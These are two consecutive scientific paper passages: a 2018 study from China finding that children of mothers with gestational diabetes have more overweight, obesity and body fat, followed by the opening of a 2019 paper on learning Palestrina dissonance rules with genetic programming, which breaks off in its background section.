weight/BMI-for-age percentile based on the WHO growth reference (20). Children’s overweight and obesity was defined by children’s Z-BMI: we defined normal weight as a BMI less than the 85th percentiles for age and gender based on the WHO growth reference (Z-score <1.035), overweight as a BMI above the 85th percentiles (Z-score ≥1.035), and obesity as a BMI above the 90th percentiles (Z-score ≥1.645) (21). Central obesity was defined as waist circumference ≥the 90th percentiles for age- and gender- specific distribution, according to the National Health and Nutrition Examination Survey (NHANES) III (22). High body fat was defined as body fat ≥the 90th percentiles of the NHANES IV (23) (since the references were available from 5 years old, we defined high body fat only among the children over 5 years old). Statistical analyses We used t-test and chi-square test to compare the general characteristics (continuous and categorical variables) of both mothers and children according to maternal GDM status. General linear models were applied to assess the differences in children’s Z-BMI, Z-weight, Z-height, body fat, waist circumference, triceps skinfold, subscapular skinfold and suprailiac skinfold according to maternal GDM status. Cox proportional hazards models were used to estimate hazards ratios for children’s overweight, obesity, central obesity and high body fat according to maternal GDM status. The analyses included three multivariable adjusted models: Model 1 adjusted for maternal age, gestational age and education; Model 2 adjusted for the variables in Model 1 and also for maternal smoking status, passive smoking status, alcohol drinking status, as well as children’s feeding method during the first 6 months after birth, children’s vegetables and fruits intake frequency, outdoor time, screen watching time and sleeping duration; Model 3 adjusted for the variables in Model 2 and also for maternal prepregnancy BMI and maternal gestational weight gain. All analyses were performed using IBM SPSS Statistics 24.0 (IBM SPSS) with a statistical significance at 0.05. This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License. https://doi.org/10.1530/EC-18-0449 https://ec.bioscientifica.com © 2018 The authors Published by Bioscientifica Ltd https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-18-0449 https://ec.bioscientifica.com J Wang et al. GDM and offspring’s obesity 14677:12 Table 1 Maternal and children’s characteristics according to maternal gestational diabetes status. Maternal and children’s characteristics Non-GDM GDM P value Number of subjects 578 578 Maternal characteristics Age at delivery, years 29.7 ± 2.91 30.5 ± 3.58 <0.001 Gestational age at delivery, weeks 39.1 ± 1.52 39.1 ± 1.34 0.54 Prepregnancy BMI, kg/m2 21.4 ± 2.94 22.9 ± 3.06 <0.001 Prepregnancy BMI categories, % <0.001 <24.0 85.6 68.0 24.0–27.9 10.7 25.8 ≥28 3.6 6.2 Gestational weight gain, kg 18.2 ± 6.70 16.6 ± 5.85 <0.001 Education, % <0.001 ≤12 years 10.7 20.1 13–15 years 75.6 72.8 ≥16 years 13.7 7.1 Current smokers, % 3.8 1.7 0.046 Passive smokers, % 54.8 52.8 0.48 Alcohol drinkers, % 31.7 21.6 <0.001 Child characteristics Boy, % 52.2 52.2 1.00 Age, months 70.4 ± 14.7 70.4 ± 14.9 0.98 Mode of infant feeding, % 0.45 Exclusive breastfeeding 40.9 44.3 Mixed breast and formula 44.5 42.9 Exclusive formula feeding 14.6 12.8 Vegetables intake frequency, % <0.001 ≤ 1 time/day 13.1 3.3 2 times/day 81.3 93.6 ≥ 3 times/day 5.5 3.1 Fruits intake frequency, % 0.60 <1 time/day 3.1 4.2 1 time/day 38.4 37.0 >1 time/day 58.5 58.8 Outdoor activity, h/day 2.12 ± 0.86 2.20 ± 0.91 0.10 Screen watching time, h/day 0.95 ± 0.76 1.17 ± 0.83 <0.001 Sleeping duration, % 0.019 ≤8 h/day 11.1 14.5 9–10 h/day 67.3 69.6 ≥11 h/day 21.6 15.9 Birth BMI, kg/m2 13.3 13.7 <0.001 Height, cm 118 ± 9.18 118 ± 9.75 0.50 Z-score for height-for-age 0.69 ± 1.01 0.75 ± 1.01 0.25 Weight, kg 22.1 ± 5.99 23.1 ± 6.91 0.011 Z-score for weight-for-age 0.45 ± 1.20 0.70 ± 1.26 0.001 Body mass index, kg/m2 15.7 ± 2.30 16.2 ± 2.59 <0.001 Z-score for body mass index-for-age 0.02 ± 1.28 0.34 ± 1.35 <0.001 Waist circumference, cm 54.7 ± 6.09 56.3 ± 6.77 <0.001 Body fat, % 19.1 ± 7.42 20.7 ± 7.97 <0.001 Triceps skinfold, mm 12.8 ± 5.36 12.7 ± 5.81 0.69 Subscapular skinfold, mm 7.22 ± 3.82 8.10 ± 4.42 <0.001 Suprailiac skinfold, mm 9.67 ± 5.96 11.6 ± 6.99 <0.001 Overweight (Z-BMI ≥1.035), % 18.5 27.0 0.001 Obesity (Z-BMI ≥1.645), % 10.6 17.0 0.002 Central obesity, % 5.7 8.8 0.04 High body fat, % 19.9 28.6 0.001 Values are means ± s.d. unless otherwise specified. GDM, gestational diabetes mellitus. This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License. https://doi.org/10.1530/EC-18-0449 https://ec.bioscientifica.com © 2018 The authors Published by Bioscientifica Ltd https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-18-0449 https://ec.bioscientifica.com J Wang et al. GDM and offspring’s obesity 14687:12 Results Table 1 presents maternal and children’s characteristics according to maternal GDM status. Compared with non- GDM mothers, GDM mothers were older at delivery, more overweight and obese before pregnancy, less current smokers and less alcohol drinkers and had less gestational weight gain and less education level. Compared with children born to non-GDM mothers, children born to GDM mothers had higher birth BMI, longer screen watching time but shorter sleeping duration. After adjustment for maternal age, gestational age, education, current smoking status, passive smoking status, alcohol drinking status and children’s feeding method, children’s vegetables and fruits intake frequency, outdoor time, screen watching time and sleeping duration (multivariable-adjusted Model 2), children born to GDM mothers had higher mean values of Z-BMI (0.33 vs 0.03), Z-weight (0.70 vs 0.45), body fat (20.7 vs 19.1%), waist circumference (56.3 vs 54.7 cm), subscapular skinfold (8.08 vs 7.24 mm) and suprailiac skinfold (11.6 vs 9.68 mm) than children born to non-GDM mothers (Table 2). After additional adjustment for maternal prepregnancy BMI and gestational weight gain (multivariable-adjusted Model 3), these differences still remained significant. The multivariable-adjusted (Model 2) odds ratios among children of GDM mothers compared with children of non-GDM mothers were 1.55 (95% confidence interval (CI) 1.14–2.10) for overweight, 1.65 (95% CI 1.14–2.40) for obesity and 1.53 (95% 1.11–2.12) for high body fat, respectively (Table 3). When further adjusting for maternal prepregnancy BMI and gestational weight gain, these associations were somewhat attenuated but remained significant. There was no significant association between GDM status and children’s central obesity. Discussion In this large study, we found that children born to GDM mothers had higher Z-weight, Z-BMI, waist circumference, body fat, subscapular skinfold and suprailiac skinfold and were associated with increased risks of overweight, obesity and high body fat compared with children born to Table 2 Comparison of children’s measurements according to maternal gestational diabetes status. Children’s measurements Multivariable-adjusted models Non-GDM (n = 578) GDM (n = 578) P value Z-score of BMI-for-age Model 1 0.02 (0.06) 0.33 (0.06) <0.001 Model 2 0.03 (0.06) 0.33 (0.06) <0.001 Model 3 0.07 (0.05) 0.29 (0.05) 0.006 Z-score of weight-for-age Model 1 0.45 (0.05) 0.70 (0.05) 0.001 Model 2 0.45 (0.05) 0.70 (0.05) 0.001 Model 3 0.48 (0.05) 0.67 (0.05) 0.009 Z-score of height-for-age Model 1 0.68 (0.04) 0.76 (0.04) 0.18 Model 2 0.68 (0.04) 0.76 (0.04) 0.21 Model 3 0.68 (0.04) 0.76 (0.04) 0.17 Body fat, % Model 1 19.1 (0.32) 20.7 (0.32) 0.001 Model 2 19.1 (0.32) 20.7 (0.32) <0.001 Model 3 19.3 (0.32) 20.5 (0.32) 0.008 Waist circumference, cm Model 1 54.7 (0.24) 56.3 (0.24) <0.001 Model 2 54.7 (0.25) 56.3 (0.25) <0.001 Model 3 54.9 (0.24) 56.1 (0.24) <0.001 Triceps skinfold, mm Model 1 12.9 (0.22) 12.7 (0.22) 0.59 Model 2 12.8 (0.22) 12.7 (0.22) 0.70 Model 3 12.9 (0.22) 12.6 (0.22) 0.29 Subscapular skinfold, mm Model 1 7.26 (0.17) 8.07 (0.17) 0.001 Model 2 7.24 (0.17) 8.08 (0.17) 0.001 Model 3 7.34 (0.17) 7.99 (0.17) 0.007 Suprailiac skinfold, mm Model 1 9.70 (0.26) 11.6 (0.26) <0.001 Model 2 9.68 (0.26) 11.6 (0.26) <0.001 Model 3 9.87 (0.26) 11.4 (0.26) <0.001 Data are means (s.e.). Model 1 adjusted for maternal age, gestational age, education, and children’s age; for Z-score of BMI-for-age, Z-score of weight- for-age and Z-score of height-for-age, adjusted for maternal age, gestational age and education only. Model 2 adjusted for covariates in Model 1 and also for maternal smoking status, passive smoking status, alcohol drinking status, as well as children’s feeding status, vegetables and fruits intake frequency, outdoor time, screening watching time and sleeping duration. Model 3 adjusted for in Model 2 and also for maternal prepregnancy BMI and weight gain during pregnancy. BMI, body mass index; GDM, gestational diabetes mellitus. This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License. https://doi.org/10.1530/EC-18-0449 https://ec.bioscientifica.com © 2018 The authors Published by Bioscientifica Ltd https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-18-0449 https://ec.bioscientifica.com J Wang et al. GDM and offspring’s obesity 14697:12 non-GDM mothers. These associations were independent of maternal prepregnancy BMI, gestational weight gain and other related maternal and infant factors. As known in the previous studies, in utero exposure to GDM is a risk factor of macrosomia and large for gestational age at birth and developing obesity and type 2 diabetes during adolescence or young adulthood in the offspring (24). However, debates on the associations between maternal GDM status and childhood overweight and obesity risks have never stopped. Studies of Northwestern Diabetes in Pregnancy Study in Chicago (5, 6), Pima Indian (8), HAPO in Hongkong (10) and Kaiser Permanente centers (11) claimed to find a positive association between maternal GDM and childhood obesity, while other studies including one HAPO study in UK argued that little association existed (12, 13, 14, 25, 26). Discrepancies in these findings may be due to small sample sizes of GDM-exposed children or research conducted among high type 2 diabetes (T2D) risk populations (Pima Indians and Chicago study (9)). The present study included a large sample size of GDM and non-GDM mother–child pairs and had enough power to compare the differences of offspring’s growth between GDM and non-GDM exposure. Also, we controlled various covariates in the multivariable-adjusted analysis, such as maternal social-economic characteristics, lifestyle factors, infant feeding status, children’s diet and lifestyle, maternal weight gain during pregnancy and prepregnancy BMI, which were identified as important confounders of this association (27). Evidence from human and animal research indicates that the environment in utero plays an important role on the growth of infants. The possible explanation underlying the findings could be ‘metabolic imprinting’, which is known as ‘the process by which a stimulus or insult occurring during a critical period of development has a long-term effect on the physiologic and metabolic responses of the offspring’ (28). It represented a determinant of an over-nutritional status of fetus and further leading to offspring’s diseases later in life (29). One of the underlying mechanisms may be the delivery of excessive nutrients from mothers to the fetus; maternal glucose but not insulin can cross the placenta which in turn influences the development of the fetus in utero and even long-term health (30). Previous animal models provided strong evidence that maternal diabetes increased the risks of offspring’s obesity and diabetes: GDM affected offspring’s obesity and insulin resistance in the livers, and further was associated with susceptibility to type 2 diabetes mellitus (31, 32). Increasing obesity among children was also associated with lifestyle changes, such as over-nutrition and more sedentary time. In this study, we also found that children born to GDM mothers had longer screen watching time but shorter sleeping duration than their counterparts. In the analysis, we controlled these diet and lifestyle variables, but they may affect children’s overweight and obesity in the real world. We tried to assess children’s obesity in a more detailed way than previous studies, so we included not only BMI, weight, height, overweight and obesity, but also body fat, waist circumference, triceps skinfold, subscapular skinfold and suprailiac skinfold as evaluating indicator of obesity. Moreover, the data were based on the Asian population, who are of increasing burden of childhood obesity and diabetes; as such identification and understanding of early life risk factors are particularly relevant. Finally, maternal GDM was diagnosed based on the WHO criteria. There were several limitations in our study. One limitation of the study was that it was a cross-sectional study. Thus, we could not make cause-and-effect inferences. Second, maternal Table 3 Odds ratios for childhood overweight, obesity, central obesity and high body fat by maternal GDM status. Outcomes No. of cases/participants Odds ratios (95% CIs) Model 1 Model 2 Model 3 Overweight Non-GDM 107/578 1.00 1.00 1.00 GDM 156/578 1.60 (1.20–2.13) 1.55 (1.14–2.10) 1.42 (1.02–1.97) Obesity Non-GDM 61/578 1.00 1.00 1.00 GDM 98/578 1.73 (1.22–2.46) 1.65 (1.14–2.40) 1.18 (1.11–1.24) Central obesity Non-GDM 33/578 1.00 1.00 1.00 GDM 51/578 1.60 (1.00–2.55) 1.60 (0.97–2.62) 1.60 (0.94–2.70) High body fat Non-GDM 96/483 1.00 1.00 1.00 GDM 140/489 1.60 (1.18–2.17) 1.53 (1.11–2.12) 1.47 (1.03–2.08) Model 1 adjusted for maternal age, gestational age, and education. Model 2 adjusted for covariates in Model 1 and also for maternal smoking status, passive smoking status, alcohol drinking status, as well as children’s feeding method, vegetables and fruits intake frequency, outdoor time, screening watching time and sleeping duration. Model 3 adjusted for in Model 2 and also for maternal prepregnancy BMI and weight gain during pregnancy. CI, confidence intervals; GDM, gestational diabetes mellitus. This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License. https://doi.org/10.1530/EC-18-0449 https://ec.bioscientifica.com © 2018 The authors Published by Bioscientifica Ltd https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-18-0449 https://ec.bioscientifica.com J Wang et al. GDM and offspring’s obesity 14707:12 prepregnancy weight and gestational weight gain were based on self-reported data, which may introduce recall bias. Nevertheless, validation studies in the United States and England have found good concordance between self-reported information during pregnancy and clinical records (33). Moreover, the children’s body measurements taken at different ages may conceal at what age this association between GDM and childhood overweight/ obesity becomes apparent. In conclusion, maternal GDM is an independent risk factor of childhood overweight and obesity, and it is associated with children’s faster growth of BMI. Children who are exposed to hyperglycemia in utero have higher risks of becoming overweight and obese. Therefore, for this high-risk population, appropriate intervention strategies are needed. Declaration of interest The authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. Funding This study was supported by the Tianjin Women’s and Children’s Health Center, Tianjin Public Health Bureau, European Foundation for the Study of Diabetes (EFSD)/Chinese Diabetes Society (CDS)/Lilly programme for Collaborative Research between China and Europe. Dr Hu was partly supported by the grant from the National Institute of Diabetes and Digestive and Kidney Diseases (R01DK100790) and the National Institute of General Medical Sciences (U54GM104940) of the National Institutes of Health. Author contribution statement G H and J W designed this study. L W, H L, J L, S Z and W L conducted the field research. J W, W L, T Z and N L conducted data organization and analysis. J W drafted the manuscript. A A B, L H and G H critically reviewed and revised the manuscript. Acknowledgements The authors would like to appreciate all the hard-working people from Tianjin Women’s and Children’s Health Center dedicating to the Tianjin Gestational Diabetes Mellitus Prevention Program. References 1 American Diabetes Association. Gestational diabetes mellitus. Diabetes Care 2003 26 (Supplement 1) S103–S105. 2 Metzger BE & Coustan DR. Summary and recommendations of the Fourth International Workshop-Conference on Gestational Diabetes Mellitus. The Organizing Committee. Diabetes Care 1998 21 (Supplement 2) B161–B167. 3 Zhu Y & Zhang C. Prevalence of gestational diabetes and risk of progression to type 2 diabetes: a global perspective. Current Diabetes Reports 2016 16 7. (https://doi.org/10.1007/s11892-015-0699-x) 4 Bellamy L, Casas JP, Hingorani AD & Williams D. Type 2 diabetes mellitus after gestational diabetes: a systematic review and meta-analysis. Lancet 2009 373 1773–1779. (https://doi.org/10.1016/ S0140-6736(09)60731-5) 5 Silverman BL, Rizzo T, Green OC, Cho NH, Winter RJ, Ogata ES, Richards GE & Metzger BE. Long-term prospective evaluation of offspring of diabetic mothers. Diabetes 1991 40 (Supplement 2) 121–125. (https://doi.org/10.2337/diab.40.2.S121) 6 Silverman BL, Rizzo TA, Cho NH & Metzger BE. Long-term effects of the intrauterine environment. The Northwestern University diabetes in pregnancy center. Diabetes Care 1998 21 (Supplement 2) B142–B149. 7 Pettitt DJ, Baird HR, Aleck KA, Bennett PH & Knowler WC. Excessive obesity in offspring of Pima Indian women with diabetes during pregnancy. New England Journal of Medicine 1983 308 242–245. (https://doi.org/10.1056/NEJM198302033080502) 8 Pettitt DJ, Nelson RG, Saad MF, Bennett PH & Knowler WC. Diabetes and obesity in the offspring of Pima Indian women with diabetes during pregnancy. Diabetes Care 1993 16 310–314. (https://doi. org/10.2337/diacare.16.1.310) 9 Dabelea D. The predisposition to obesity and diabetes in offspring of diabetic mothers. Diabetes Care 2007 30 (Supplement 2) S169–S174. (https://doi.org/10.2337/dc07-s211) 10 Tam WH, Ma RCW, Ozaki R, Li AM, Chan MHM, Yuen LY, Lao TTH, Yang X, Ho CS, Tutino GE, et al. In utero exposure to maternal hyperglycemia increases childhood cardiometabolic risk in offspring. Diabetes Care 2017 40 679–686. (https://doi. org/10.2337/dc16-2397) 11 Hillier TA, Pedula KL, Vesco KK, Oshiro CE & Ogasawara KK. Impact of maternal glucose and gestational weight gain on child obesity over the first decade of life in normal birth weight infants. Maternal and Child Health Journal 2016 20 1559–1568. (https://doi.org/10.1007/ s10995-016-1955-7) 12 Whitaker RC, Pepe MS, Seidel KD, Wright JA & Knopp RH. Gestational diabetes and the risk of offspring obesity. Pediatrics 1998 101 E9. (https://doi.org/10.1542/peds.101.2.e9) 13 Gillman MW, Rifas-Shiman S, Berkey CS, Field AE & Colditz GA. Maternal gestational diabetes, birth weight, and adolescent obesity. Pediatrics 2003 111 e221–e226. (https://doi.org/10.1542/ peds.111.3.e221) 14 Tam WH, Ma RC, Yang X, Ko GT, Tong PC, Cockram CS, Sahota DS, Rogers MS & Chan JC. Glucose intolerance and cardiometabolic risk in children exposed to maternal gestational diabetes mellitus in utero. Pediatrics 2008 122 1229–1234. (https://doi.org/10.1542/ peds.2008-0158) 15 WHO Consultation. Definition, Diagnosis and Classification of Diabetes Mellitus and Its Complications. Part 1: Diagnosis and Classification of Diabetes Mellitus. Geneva, Switzerland: World Health Organization, 1999. 16 Li W, Liu H, Qiao Y, Lv F, Zhang S, Wang L, Leng J, Qi L, Tuomilehto J & Hu G. Metabolic syndrome of weight change from pre-pregnancy to 1–5 years post-partum among Chinese women with prior gestational diabetes. Diabetic Medicine 2015 32 1492–1499. (https://doi.org/10.1111/dme.12790) 17 Hu G, Tian H, Zhang F, Liu H, Zhang C, Zhang S, Wang L, Liu G, Yu Z, Yang X, et al. Tianjin Gestational Diabetes Mellitus Prevention Program: study design, methods, and 1-year interim report on the feasibility of lifestyle intervention program. Diabetes Research and Clinical Practice 2012 98 508–517. (https://doi.org/10.1016/j. diabres.2012.09.015) 18 Li YP, He YN, Zhai FY, Yang XG, Hu XQ, Zhao WH & Ma GS. [Comparison of assessment of food intakes by using 3 dietary survey methods]. Zhonghua Yu Fang Yi Xue Za Zhi 2006 40 273–280. 19 Zhou B. [Predictive values of body mass index and waist circumference to risk factors of related diseases in Chinese adult population]. Zhonghua Liu Xing Bing Xue Za Zhi 2002 23 5–10. 20 World Health Organization. The WHO Child Growth Standards. Geneva, Switzerland: World Health Organization, 2006. This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License. https://doi.org/10.1530/EC-18-0449 https://ec.bioscientifica.com © 2018 The authors Published by Bioscientifica Ltd https://doi.org/10.1007/s11892-015-0699-x https://doi.org/10.1016/S0140-6736(09)60731-5 https://doi.org/10.1016/S0140-6736(09)60731-5 https://doi.org/10.2337/diab.40.2.S121 https://doi.org/10.1056/NEJM198302033080502 https://doi.org/10.2337/diacare.16.1.310 https://doi.org/10.2337/diacare.16.1.310 https://doi.org/10.2337/dc07-s211 https://doi.org/10.2337/dc16-2397 https://doi.org/10.2337/dc16-2397 https://doi.org/10.1007/s10995-016-1955-7 https://doi.org/10.1007/s10995-016-1955-7 https://doi.org/10.1542/peds.101.2.e9 https://doi.org/10.1542/peds.111.3.e221 https://doi.org/10.1542/peds.111.3.e221 https://doi.org/10.1542/peds.2008-0158 https://doi.org/10.1542/peds.2008-0158 https://doi.org/10.1111/dme.12790 https://doi.org/10.1016/j.diabres.2012.09.015 https://doi.org/10.1016/j.diabres.2012.09.015 https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-18-0449 https://ec.bioscientifica.com J Wang et al. GDM and offspring’s obesity 14717:12 21 Ogden CL, Carroll MD, Kit BK & Flegal KM. Prevalence of obesity and trends in body mass index among US children and adolescents, 1999–2010. JAMA 2012 307 483–490. (https://doi.org/10.1001/ jama.2012.40) 22 Fernandez JR, Redden DT, Pietrobelli A & Allison DB. Waist circumference percentiles in nationally representative samples of African-American, European-American, and Mexican-American children and adolescents. Journal of Pediatrics 2004 145 439–444. (https://doi.org/10.1016/j.jpeds.2004.06.044) 23 Laurson KR, Eisenmann JC & Welk GJ. Body fat percentile curves for U.S. children and adolescents. American Journal of Preventive Medicine 2011 41 S87–S92. (https://doi.org/10.1016/j.amepre.2011.06.044) 24 Reece EA. The fetal and maternal consequences of gestational diabetes mellitus. Journal of Maternal-Fetal and Neonatal Medicine 2010 23 199–203. (https://doi.org/10.3109/14767050903550659) 25 Thaware PK, McKenna S, Patterson CC, Hadden DR, Pettitt DJ & McCance DR. Untreated mild hyperglycemia during pregnancy and anthropometric measures of obesity in offspring at Age 5–7 years. Diabetes Care 2015 38 1701–1706. (https://doi.org/10.2337/ dc14-2797) 26 Pettitt DJ, McKenna S, McLaughlin C, Patterson CC, Hadden DR & McCance DR. Maternal glucose at 28 weeks of gestation is not associated with obesity in 2-year-old offspring: the Belfast Hyperglycemia and Adverse Pregnancy Outcome (HAPO) family study. Diabetes Care 2010 33 1219–1223. (https://doi.org/10.2337/ dc09-2384) 27 Lawlor DA. The Society for Social Medicine John Pemberton Lecture 2011. Developmental overnutrition-an old hypothesis with new importance? International Journal of Epidemiology 2013 42 7–29. (https://doi.org/10.1093/ije/dys209) 28 Sullivan EL & Grove KL. Metabolic imprinting in obesity. Forum of Nutrition 2010 63 186–194. 29 Waterland RA & Garza C. Potential mechanisms of metabolic imprinting that lead to chronic disease. American Journal of Clinical Nutrition 1999 69 179–197. (https://doi.org/10.1093/ajcn/69.2.179) 30 Fraser A & Lawlor DA. Long-term health outcomes in offspring born to women with diabetes in pregnancy. Current Diabetes Reports 2014 14 489. (https://doi.org/10.1007/s11892-014-0489-x) 31 Oh W, Gelardi NL & Cha CJ. Maternal hyperglycemia in pregnant rats: its effect on growth and carbohydrate metabolism in the offspring. Metabolism 1988 37 1146–1151. (https://doi. org/10.1016/0026-0495(88)90192-8) 32 Yamashita H, Shao J, Qiao L, Pagliassotti M & Friedman JE. Effect of spontaneous gestational diabetes on fetal and postnatal hepatic insulin resistance in Lepr(db/+) mice. Pediatric Research 2003 53 411–418. (https://doi.org/10.1203/01.PDR.0000049667.58071.7D) 33 Dietz P, Bombard J, Mulready-Ward C, Gauthier J, Sackoff J, Brozicevic P, Gambatese M, Nyland-Funke M, England L, Harrison L, et al. Validation of self-reported maternal and infant health indicators in the Pregnancy Risk Assessment Monitoring System. Maternal and Child Health Journal 2014 18 2489–2498. (https://doi. org/10.1007/s10995-014-1487-y) Received in final form 14 November 2018 Accepted 30 November 2018 Accepted Preprint published online 3 December 2018 This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License. https://doi.org/10.1530/EC-18-0449 https://ec.bioscientifica.com © 2018 The authors Published by Bioscientifica Ltd https://doi.org/10.1001/jama.2012.40 https://doi.org/10.1001/jama.2012.40 https://doi.org/10.1016/j.jpeds.2004.06.044 https://doi.org/10.1016/j.amepre.2011.06.044 https://doi.org/10.3109/14767050903550659 https://doi.org/10.2337/dc14-2797 https://doi.org/10.2337/dc14-2797 https://doi.org/10.2337/dc09-2384 https://doi.org/10.2337/dc09-2384 https://doi.org/10.1093/ije/dys209 https://doi.org/10.1093/ajcn/69.2.179 https://doi.org/10.1007/s11892-014-0489-x https://doi.org/10.1016/0026-0495(88)90192-8 https://doi.org/10.1016/0026-0495(88)90192-8 https://doi.org/10.1203/01.PDR.0000049667.58071.7D https://doi.org/10.1007/s10995-014-1487-y https://doi.org/10.1007/s10995-014-1487-y https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-18-0449 https://ec.bioscientifica.com Abstract Introduction Methods GDM screening process Study population Calculation of BMI Children’s Z scores and overweight/obesity Statistical analyses Results Discussion Declaration of interest Funding Author contribution statement Acknowledgements References work_mowcu4jdxvfyvmw4r3nsi27c2e ---- Machine learning of symbolic compositional rules with genetic programming: dissonance treatment in Palestrina Machine learning of symbolic compositional rules with genetic programming: dissonance treatment in Palestrina Torsten Anders1 and Benjamin Inden2 1 School of Media Arts and Performance, University of Bedfordshire, Luton, Bedfordshire, UK 2 Department of Computer Science and Technology, Nottingham Trent University, Nottingham, UK ABSTRACT We describe a method for automatically extracting symbolic compositional rules from music corpora. Resulting rules are expressed by a combination of logic and numeric relations, and they can therefore be studied by humans. These rules can also be used for algorithmic composition, where they can be combined with each other and with manually programmed rules. We chose genetic programming (GP) as our machine learning technique, because it is capable of learning formulas consisting of both logic and numeric relations. GP was never used for this purpose to our knowledge. We therefore investigate a well understood case in this study: dissonance treatment in Palestrina’s music. We label dissonances with a custom algorithm, automatically cluster melodic fragments with labelled dissonances into different dissonance categories (passing tone, suspension etc.) with the DBSCAN algorithm, and then learn rules describing the dissonance treatment of each category with GP. Learning is based on the requirement that rules must be broad enough to cover positive examples, but narrow enough to exclude negative examples. Dissonances from a given category are used as positive examples, while dissonances from other categories, melodic fragments without dissonances, purely random melodic fragments, and slight random transformations of positive examples, are used as negative examples. Subjects Artificial Intelligence, Data Mining and Machine Learning, Multimedia Keywords Counterpoint, Rule learning, Palestrina, Genetic programming, Clustering, Algorithmic composition, Dissonance detection, Computer music INTRODUCTION Artificial intelligence methods have been used for decades to model music composition (Fernández & Vico, 2013). Two general approaches have attracted particular attention, as they mimic two aspects of how humans learn to compose. Firstly, rules have been used for centuries for teaching composition. Some algorithmic composition methods model symbolic knowledge and rules, for example, constraint-based approaches and formal grammars. Secondly, composers learn from examples of existing music. Machine learning (ML) methods of algorithmic composition include Markov chains, and artificial neural networks. How to cite this article Anders T, Inden B. 2019. Machine learning of symbolic compositional rules with genetic programming: dissonance treatment in Palestrina. PeerJ Comput. Sci. 5:e244 DOI 10.7717/peerj-cs.244 Submitted 2 May 2019 Accepted 8 November 2019 Published 16 December 2019 Corresponding author Benjamin Inden, benjamin.inden@ntu.ac.uk Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 17 DOI 10.7717/peerj-cs.244 © 2019 Anders and Inden Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.244 mailto:benjamin.�inden@�ntu.�ac.�uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.244 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ We aim at combining these two approaches by automatically learning compositional rules from music corpora. We use genetic programming (GP) (Poli, Langdon & McPhee, 2008) for that purpose. The resulting rules are represented symbolically, and can thus be studied by humans (in contrast to, say, artificial neural networks), but the rules can also be integrated into algorithmic composition systems. Extracting rules automatically is useful, for example, for musicologists to better understand the style of certain corpora, and for composers who use computers as a creative partner (computer-aided composition). For computer scientists, it is a challenging application domain. The resulting rules can be used in existing rule-based approaches to algorithmic composition where multiple rules can be freely combined, for example, in constraint-based systems (Anders & Miranda, 2011). Rules derived by ML and rules programmed manually can be freely combined in such systems, and rules can address various aspects (e.g. rules on rhythm, melody, harmony, voice leading, and orchestration). Potentially, ML can be used to derive rules from a given corpus of music for aspects where we do not have rules yet, for example, how to rhythmically and melodically shape the development of a phrase in a certain style. This article describes a pilot project within the research programme described above. In this pilot, we automatically extract rules for the treatment of dissonances in Renaissance music using a corpus of movements from Palestrina masses. The treatment of such dissonances is rather well understood, which helps evaluating results. Nevertheless, this task is far from trivial, as it has to take various musical viewpoints into account (e.g. melodic interval sizes and directions, note durations, and metric positions). Results can be interesting and useful not only for musicologists and composers, but also for the commercially relevant field of music information retrieval to advance the still unsolved problem of automatic harmonic analysis of polyphonic music. BACKGROUND Inductive logic programming Symbolic compositional rules have been extracted by ML before, specifically with inductive logic programming (ILP). ILP (Muggleton et al., 2012) combines logic programming with ML in order to learn first-order logic formulas from examples. Background knowledge expressed in logic programmes can be taken into account. Inductive logic programming has been used for several musical applications. Closely related to our goal is the work of Morales & Morales (1995). Their system learnt standard counterpoint rules on voice leading, namely how to avoid open parallels. Other musical applications of ILP include the learning of harmonic rules that express differences between two music corpora, specifically Beatles songs (pop music) and the Real Book (jazz) (Anglade & Dixon, 2008), and music performance rules for piano (Tobudic & Widmer, 2003) and violin (Ramirez et al., 2010). Numeric relations are difficult to deduce with ILP, as logic programming in general is very restricted in expressing numeric relations. We are specifically interested in also learning numeric relations besides logic relations, because our experience with Anders and Inden (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.244 2/19 http://dx.doi.org/10.7717/peerj-cs.244 https://peerj.com/computer-science/ constraint-based modelling of music composition makes us aware of their importance for compositional rules. For example, the size of melodic and harmonic intervals is important, and such quantities are best expressed numerically. Besides, we want to use learnt rules later with constraint programming, a programming paradigm with very good support for restricting numeric relations. Genetic programming In this project we therefore use another approach. GP is a particular kind of evolutionary algorithm that is used for ML. In GP, a tree structure is learnt by repeated application of random changes (mutation and recombination) and by the selection of the best structures among a set of candidates (a population) according to some criterion. A candidate tree can be the representation of a computer program or a mathematical equation among other possibilities. Early seminal work on GP has been published by Koza (1992), a more recent practical introduction can be found in Poli, Langdon & McPhee (2008). A particularly important application of GP is symbolic regression. Symbolic regression infers a mathematical expression that best fits the given data. The mathematical expression is unrestricted except that a specified set of building blocks is used–operators like +, or standard mathematical functions. The trees that GP builds from these building blocks are representations of such mathematical expressions. Symbolic regression is a powerful method that has been used in various areas of science and engineering (Poli, Langdon & McPhee, 2008), including a high-profile study where it was used to automatically deduce physical laws from experiments (Schmidt & Lipson, 2009). Genetic programming has been used for music 